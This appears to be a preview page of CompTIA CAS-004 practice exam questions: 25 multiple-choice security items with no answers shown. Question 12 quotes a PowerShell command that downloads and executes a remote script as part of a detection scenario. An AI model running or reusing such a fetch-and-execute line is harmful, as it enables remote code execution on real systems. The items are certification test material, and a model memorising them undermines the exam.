CAS-004Free trialFree trial

By comptia
Aug, 2025

Verified

25Q per page

Question 1

An organization is referencing NIST best practices for BCP creation while reviewing current internal organizational processes for mission-essential items.
Which of the following phases establishes the identification and prioritization of critical systems and functions?

  • A: Review a recent gap analysis.
  • B: Perform a cost-benefit analysis.
  • C: Conduct a business impact analysis.
  • D: Develop an exposure factor matrix.

Question 2

An organization is implementing a new identity and access management architecture with the following objectives:
✑ Supporting MFA against on-premises infrastructure
✑ Improving the user experience by integrating with SaaS applications
✑ Applying risk-based policies based on location
✑ Performing just-in-time provisioning
Which of the following authentication protocols should the organization implement to support these requirements?

  • A: Kerberos and TACACS
  • B: SAML and RADIUS
  • C: OAuth and OpenID
  • D: OTP and 802.1X

Question 3

A security analyst observes the following while looking through network traffic in a company's cloud log:

Image 1

Which of the following steps should the security analyst take FIRST?

  • A: Quarantine 10.0.5.52 and run a malware scan against the host.
  • B: Access 10.0.5.52 via EDR and identify processes that have network connections.
  • C: Isolate 10.0.50.6 via security groups.
  • D: Investigate web logs on 10.0.50.6 to determine if this is normal traffic.

Question 4

Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint?

  • A: Isolation control failure
  • B: Management plane breach
  • C: Insecure data deletion
  • D: Resource exhaustion

Question 5

An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice.
Which of the following should the organization consider FIRST to address this requirement?

  • A: Implement a change management plan to ensure systems are using the appropriate versions.
  • B: Hire additional on-call staff to be deployed if an event occurs.
  • C: Design an appropriate warm site for business continuity.
  • D: Identify critical business processes and determine associated software and hardware requirements.

Question 6

Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:

  • A: when it is passed across a local network.
  • B: in memory during processing
  • C: when it is written to a system's solid-state drive.
  • D: by an enterprise hardware security module.

Question 7

A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
✑ Support all phases of the SDLC.
✑ Use tailored website portal software.
✑ Allow the company to build and use its own gateway software.
✑ Utilize its own data management platform.
✑ Continue using agent-based security tools.
Which of the following cloud-computing models should the CIO implement?

  • A: SaaS
  • B: PaaS
  • C: MaaS
  • D: IaaS

Question 8

A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?

  • A: Worm
  • B: Logic bomb
  • C: Fileless
  • D: Rootkit

Question 9

A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.)

  • A: Bot protection
  • B: OAuth 2.0
  • C: Input validation
  • D: Autoscaling endpoints
  • E: Rate limiting
  • F: CSRF protection

Question 10

An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?

  • A: Adding a second redundant layer of alternate vendor VPN concentrators
  • B: Using Base64 encoding within the existing site-to-site VPN connections
  • C: Distributing security resources across VPN sites
  • D: Implementing IDS services with each VPN concentrator
  • E: Transitioning to a container-based architecture for site-based services

Question 11

A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?

  • A: Encryption in transit
  • B: Legal issues
  • C: Chain of custody
  • D: Order of volatility
  • E: Key exchange

Question 12

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois
Which of the following security controls would have alerted and prevented the next phase of the attack?

  • A: Antivirus and UEBA
  • B: Reverse proxy and sandbox
  • C: EDR and application approved list
  • D: Forward proxy and MFA

Question 13

Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?

  • A: Lattice-based cryptography
  • B: Quantum computing
  • C: Asymmetric cryptography
  • D: Homomorphic encryption

Question 14

As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?

  • A: Risk rejection
  • B: Risk mitigation
  • C: Risk transference
  • D: Risk avoidance

Question 15

A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?

  • A: Securely configure the authentication mechanisms.
  • B: Patch the infrastructure at the operating system.
  • C: Execute port scanning against the services.
  • D: Upgrade the service as part of life-cycle management.

Question 16

A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information?

  • A: HIPS
  • B: UEBA
  • C: HIDS
  • D: NIDS

Question 17

The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?

  • A: Software composition analysis
  • B: Code obfuscation
  • C: Static analysis
  • D: Dynamic analysis

Question 18

A forensic investigator would use the foremost command for:

  • A: cloning disks.
  • B: analyzing network-captured packets.
  • C: recovering lost files.
  • D: extracting features such as email addresses.

Question 19

A software company is developing an application in which data must be encrypted with a cipher that requires the following:
✑ Initialization vector
✑ Low latency
✑ Suitable for streaming
Which of the following ciphers should the company use?

  • A: Cipher feedback
  • B: Cipher block chaining message authentication code
  • C: Cipher block chaining
  • D: Electronic codebook

Question 20

An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational.
Which of the following BEST describes the reason why the silent failure occurred?

  • A: The system logs rotated prematurely.
  • B: The disk utilization alarms are higher than what the service restarts require.
  • C: The number of nodes in the self-healing cluster was healthy.
  • D: Conditional checks prior to the service restart succeeded.

Question 21

A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.
Which of the following technologies would BEST meet this need?

  • A: Faraday cage
  • B: WPA2 PSK
  • C: WPA3 SAE
  • D: WEP 128 bit

Question 22

An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.
Which of the following side-channel attacks did the team use?

  • A: Differential power analysis
  • B: Differential fault analysis
  • C: Differential temperature analysis
  • D: Differential timing analysis

Question 23

A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

  • A: NAC to control authorized endpoints
  • B: FIM on the servers storing the data
  • C: A jump box in the screened subnet
  • D: A general VPN solution to the primary network

Question 24

A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company's services to ensure false positives do not drop legitimate traffic.
Which of the following would satisfy the requirement?

  • A: NIDS
  • B: NIPS
  • C: WAF
  • D: Reverse proxy

Question 25

A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN.
Which of the following solutions does this describe?

  • A: Full tunneling
  • B: Asymmetric routing
  • C: SSH tunneling
  • D: Split tunneling
Page 1 of 26 • Questions 1-25 of 642
12345

Free preview mode

Enjoy the free questions and consider upgrading to gain full access!